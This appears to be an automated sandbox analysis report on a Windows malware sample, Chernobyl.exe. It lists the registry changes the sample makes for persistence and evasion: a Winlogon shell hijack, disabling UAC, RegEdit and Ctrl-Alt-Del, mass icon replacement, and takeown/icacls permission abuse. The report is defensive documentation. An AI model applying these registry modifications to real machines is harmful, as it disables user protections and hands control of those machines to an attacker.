Malware Analysis Report

2024-11-16 12:33

Sample ID 240303-c5ymgacb93
Target Chernobyl.exe
SHA256 97609ae0b6b53252439d92caf6261c32cad76a69c93047c336cc5c42b458af3d
Tags
discovery evasion exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

97609ae0b6b53252439d92caf6261c32cad76a69c93047c336cc5c42b458af3d

Threat Level: Known bad

The file Chernobyl.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit persistence trojan

Modifies WinLogon for persistence

Contains code to disable Windows Defender

UAC bypass

Possible privilege escalation attempt

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Modifies file permissions

Modifies system executable filetype association

Loads dropped DLL

Modifies WinLogon

Checks whether UAC is enabled

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

System policy modification

Modifies registry class

Modifies File Icons

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-03 02:40

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-03 02:40

Reported

2024-03-03 02:42

Platform

win7-20240221-en

Max time kernel

56s

Max time network

18s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\kill.ico C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
File opened for modification C:\Windows\System32\wallpaper.jpg C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\cluttscape.exe C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
File opened for modification C:\Windows\cluttscape.exe C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Enumerates physical storage devices

Modifies File Icons

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
